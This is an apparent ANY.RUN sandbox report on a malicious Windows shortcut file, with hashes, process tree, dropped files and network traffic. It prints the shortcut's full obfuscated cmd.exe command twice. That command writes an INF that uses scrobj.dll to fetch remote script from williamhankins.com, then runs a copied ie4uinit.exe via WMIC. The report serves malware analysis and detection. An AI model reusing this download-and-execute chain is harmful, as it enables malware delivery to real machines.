File name:

822e1359b7e7eabc9199a055fd772819176d2e5cae63d0d24787579634d45d42.lnk

Full analysis: https://app.any.run/tasks/5577d318-d5af-4896-a39d-9d9c2428e6c2
Verdict: Malicious activity
Analysis date: December 15, 2021, 15:02:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=97, Archive, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=236544, window=hide
MD5:

304F4211F9F51E2363BC782F80A0B9FB

SHA1:

DEB2B1EA8B3FF8D73435B7051CF3E7BEEB0A7E93

SHA256:

822E1359B7E7EABC9199A055FD772819176D2E5CAE63D0D24787579634D45D42

SSDEEP:

48:8mpLgBxh/NPOyX2jMM+KBfMHM2lRBfGyfJEbI5:8mpyQMcfMlUVc

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops executable file immediately after starts

      • cmd.exe (PID: 3416)
    • Application was dropped or rewritten from another process

      • ie4uinit.exe (PID: 488)
      • ie4uinit.exe (PID: 3492)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • cmd.exe (PID: 3416)
    • Checks supported languages

      • cmd.exe (PID: 3416)
      • WMIC.exe (PID: 3656)
      • ie4uinit.exe (PID: 488)
      • ie4uinit.exe (PID: 3492)
    • Reads the computer name

      • WMIC.exe (PID: 3656)
      • ie4uinit.exe (PID: 488)
      • ie4uinit.exe (PID: 3492)
    • Creates files in the user directory

      • cmd.exe (PID: 3416)
    • Uses WMIC.EXE to create a new process

      • cmd.exe (PID: 3416)
    • Drops a file that was compiled in debug mode

      • cmd.exe (PID: 3416)
    • Executed via WMI

      • ie4uinit.exe (PID: 488)
    • Application launched itself

      • ie4uinit.exe (PID: 488)
    • Removes files from Windows directory

      • ie4uinit.exe (PID: 488)
    • Creates files in the Windows directory

      • ie4uinit.exe (PID: 488)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

MachineID: -
IconFileName: imageres.dll
CommandLineArguments: /v /c set "xkHcMZ8774=set" && call set "xkHcMZ3158=%xkHcMZ8774:~0,1%" && (for %b in (c) do @set "xkHcMZ3860=%~b") && !xkHcMZ3158!et "xkHcMZ49524=$w" && set "xkHcMZ7707=i" && set "xkHcMZ9130=a" && set "xkHcMZ5622=t" && !xkHcMZ3158!et "xkHcMZ02917=d" && set "xkHcMZ8922=." && set "xkHcMZ34246=init" && set "xkHcMZ85701=si" && set "xkHcMZ35882=e" && set "xkHcMZ56975=settings" && set "xkHcMZ51776=!xkHcMZ8922!inf" && set "xkHcMZ6296=ieu!xkHcMZ34246!!xkHcMZ51776!" && call !xkHcMZ3158!et "xkHcMZ01439=%app!xkHcMZ02917!ata%\Micro!xkHcMZ3158!oft\" && !xkHcMZ3158!et "xkHcMZ51087=!xkHcMZ01439!!xkHcMZ6296!" && set "xkHcMZ3287="^" && (for %f in ("[version]" "signature = !xkHcMZ49524!indows ntf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[!xkHcMZ02917!e!xkHcMZ3158!tinationdirs]" "01CAC=01" "[!xkHcMZ02917!efaultin!xkHcMZ3158!tall.windows7]" "UnRegis!xkHcMZ5622!erOCXs=525B" "!xkHcMZ02917!elf!xkHcMZ7707!les=01CAC" "[525B]" "%11%\scRo%xkHcMZ07955%j,NI,%xkHcMZ42534%%xkHcMZ47574%%xkHcMZ47574%p%xkHcMZ97627%%xkHcMZ5124%%xkHcMZ5124%williamhankins!xkHcMZ8922!%xkHcMZ5302%/kal5bgh7o2" "[01CAC]" "ieu%xkHcMZ74703%!xkHcMZ51776!" "[!xkHcMZ3158!!xkHcMZ5622!rings]" "xkHcMZ74703=!xkHcMZ34246!" "xkHcMZ47574=t" "!xkHcMZ3158!ervicen!xkHcMZ9130!me=' '" "xkHcMZ42534=h" "xkHcMZ97627=:" "xkHcMZ5124=/" "!xkHcMZ3158!hortsvcn!xkHcMZ9130!me=' '" "xkHcMZ5302=com" "xkHcMZ07955=b") do @e!xkHcMZ3860!ho %~f)>"!xkHcMZ51087!" && !xkHcMZ3158!et "xkHcMZ5079=ie4u!xkHcMZ34246!.!xkHcMZ35882!xe" && call copy /Y %win!xkHcMZ02917!ir%\!xkHcMZ3158!ystem32\!xkHcMZ5079! "!xkHcMZ01439!" > nul && !xkHcMZ3158!t!xkHcMZ9130!rt "" /MIN wmi!xkHcMZ3860! proce!xkHcMZ3158!s call !xkHcMZ3860!rea!xkHcMZ5622!e "!xkHcMZ01439!!xkHcMZ5079! -base!xkHcMZ56975!"
RelativePath: ..\..\..\..\..\
LocalBasePath: -
VolumeLabel: -
DriveType: Fixed Disk
TargetFileDOSName: -
HotKey: (none)
RunWindow: Normal
IconIndex: 97
TargetFileSize: 236544
FileAttributes: Archive
Flags: IDList, LinkInfo, RelativePath, CommandArgs, IconFile, Unicode, ExpString
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
4
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start cmd.exe wmic.exe no specs ie4uinit.exe ie4uinit.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
488C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe -basesettingsC:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
IE Per-User Initialization Utility
Exit code:
0
Version:
11.00.9600.19597 (winblue_ltsb_escrow.191216-1311)
Modules
Images
c:\users\admin\appdata\roaming\microsoft\ie4uinit.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
3416"C:\Windows\System32\cmd.exe" /v /c set "xkHcMZ8774=set" && call set "xkHcMZ3158=%xkHcMZ8774:~0,1%" && (for %b in (c) do @set "xkHcMZ3860=%~b") && !xkHcMZ3158!et "xkHcMZ49524=$w" && set "xkHcMZ7707=i" && set "xkHcMZ9130=a" && set "xkHcMZ5622=t" && !xkHcMZ3158!et "xkHcMZ02917=d" && set "xkHcMZ8922=." && set "xkHcMZ34246=init" && set "xkHcMZ85701=si" && set "xkHcMZ35882=e" && set "xkHcMZ56975=settings" && set "xkHcMZ51776=!xkHcMZ8922!inf" && set "xkHcMZ6296=ieu!xkHcMZ34246!!xkHcMZ51776!" && call !xkHcMZ3158!et "xkHcMZ01439=%app!xkHcMZ02917!ata%\Micro!xkHcMZ3158!oft\" && !xkHcMZ3158!et "xkHcMZ51087=!xkHcMZ01439!!xkHcMZ6296!" && set "xkHcMZ3287="^" && (for %f in ("[version]" "signature = !xkHcMZ49524!indows ntf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[!xkHcMZ02917!e!xkHcMZ3158!tinationdirs]" "01CAC=01" "[!xkHcMZ02917!efaultin!xkHcMZ3158!tall.windows7]" "UnRegis!xkHcMZ5622!erOCXs=525B" "!xkHcMZ02917!elf!xkHcMZ7707!les=01CAC" "[525B]" "%11%\scRo%xkHcMZ07955%j,NI,%xkHcMZ42534%%xkHcMZ47574%%xkHcMZ47574%p%xkHcMZ97627%%xkHcMZ5124%%xkHcMZ5124%williamhankins!xkHcMZ8922!%xkHcMZ5302%/kal5bgh7o2" "[01CAC]" "ieu%xkHcMZ74703%!xkHcMZ51776!" "[!xkHcMZ3158!!xkHcMZ5622!rings]" "xkHcMZ74703=!xkHcMZ34246!" "xkHcMZ47574=t" "!xkHcMZ3158!ervicen!xkHcMZ9130!me=' '" "xkHcMZ42534=h" "xkHcMZ97627=:" "xkHcMZ5124=/" "!xkHcMZ3158!hortsvcn!xkHcMZ9130!me=' '" "xkHcMZ5302=com" "xkHcMZ07955=b") do @e!xkHcMZ3860!ho %~f)>"!xkHcMZ51087!" && !xkHcMZ3158!et "xkHcMZ5079=ie4u!xkHcMZ34246!.!xkHcMZ35882!xe" && call copy /Y %win!xkHcMZ02917!ir%\!xkHcMZ3158!ystem32\!xkHcMZ5079! "!xkHcMZ01439!" > nul && !xkHcMZ3158!t!xkHcMZ9130!rt "" /MIN wmi!xkHcMZ3860! proce!xkHcMZ3158!s call !xkHcMZ3860!rea!xkHcMZ5622!e "!xkHcMZ01439!!xkHcMZ5079! -base!xkHcMZ56975!"C:\Windows\System32\cmd.exe
Explorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3492C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe -ClearIconCacheC:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exeie4uinit.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
IE Per-User Initialization Utility
Exit code:
0
Version:
11.00.9600.19597 (winblue_ltsb_escrow.191216-1311)
Modules
Images
c:\users\admin\appdata\roaming\microsoft\ie4uinit.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3656wmic process call create "C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings"C:\Windows\System32\Wbem\WMIC.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\ole32.dll
Total events
759
Read events
666
Write events
93
Delete events
0

Modification events

(PID) Process:(488) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3
Operation:writeName:IEPropFontName
Value:
Times New Roman
(PID) Process:(488) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3
Operation:writeName:IEFixedFontName
Value:
Courier New
(PID) Process:(488) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\4
Operation:writeName:IEPropFontName
Value:
Times New Roman
(PID) Process:(488) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\4
Operation:writeName:IEFixedFontName
Value:
Courier New
(PID) Process:(488) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\5
Operation:writeName:IEPropFontName
Value:
Times New Roman
(PID) Process:(488) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\5
Operation:writeName:IEFixedFontName
Value:
Courier New
(PID) Process:(488) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\6
Operation:writeName:IEPropFontName
Value:
Times New Roman
(PID) Process:(488) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\6
Operation:writeName:IEFixedFontName
Value:
Courier New
(PID) Process:(488) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\7
Operation:writeName:IEPropFontName
Value:
Sylfaen
(PID) Process:(488) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\7
Operation:writeName:IEFixedFontName
Value:
Sylfaen
Executable files
1
Suspicious files
0
Text files
6
Unknown types
2

Dropped files

PID
Process
Filename
Type
3416cmd.exeC:\Users\admin\AppData\Roaming\Microsoft\ieuinit.infini
MD5:
SHA256:
488ie4uinit.exeC:\Windows\Temp\OLD7200.tmpini
MD5:
SHA256:
488ie4uinit.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txttext
MD5:
SHA256:
488ie4uinit.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\msapplication.xmlxml
MD5:
SHA256:
3416cmd.exeC:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exeexecutable
MD5:ACA03178C248B32343B03F4B9ACCE1B9
SHA256:C3612DA14216A2F5872BD0D140A76D1A257E9668EFA46A5CED5419E51ED30B49
488ie4uinit.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\brndlog.baktext
MD5:E9E473C9777B0C24D50EE8C972A78FE2
SHA256:90BE32975E76E679B01FF719148DF508CBBE2D7F2C47D93201F33A31994B4174
488ie4uinit.exeC:\Users\admin\AppData\Local\Temp\www729E.tmpurl
MD5:873C8643CBBFB8FF63731BC25AC9B18C
SHA256:C4AD21379C11DA7943C605EADB22F6FC6F54B49783466F8C1F3AD371EB167466
488ie4uinit.exeC:\Users\admin\AppData\Local\Temp\www72CE.tmpurl
MD5:C2858B664C882DCCE6042C40041F6108
SHA256:B4A6FB97B5E3F87BCD9FAE49A9174E3F5B230A37767D7A70BF33D151702EFF91
488ie4uinit.exeC:\Users\admin\Favorites\Links\Web Slice Gallery.urltext
MD5:1E7E5E93C2A5AADAF932F93D25C57F3E
SHA256:8B94D04FECE582E4182E8E73F46FB86EB8E965C69C526C42805ABB9E43641E35
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
488
ie4uinit.exe
GET
200
13.58.15.217:80
http://williamhankins.com/kal5bgh7o2
US
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
488
ie4uinit.exe
13.58.15.217:80
williamhankins.com
Amazon.com, Inc.
US
unknown

DNS requests

Domain
IP
Reputation
williamhankins.com
  • 13.58.15.217
unknown

Threats

No threats detected
No debug info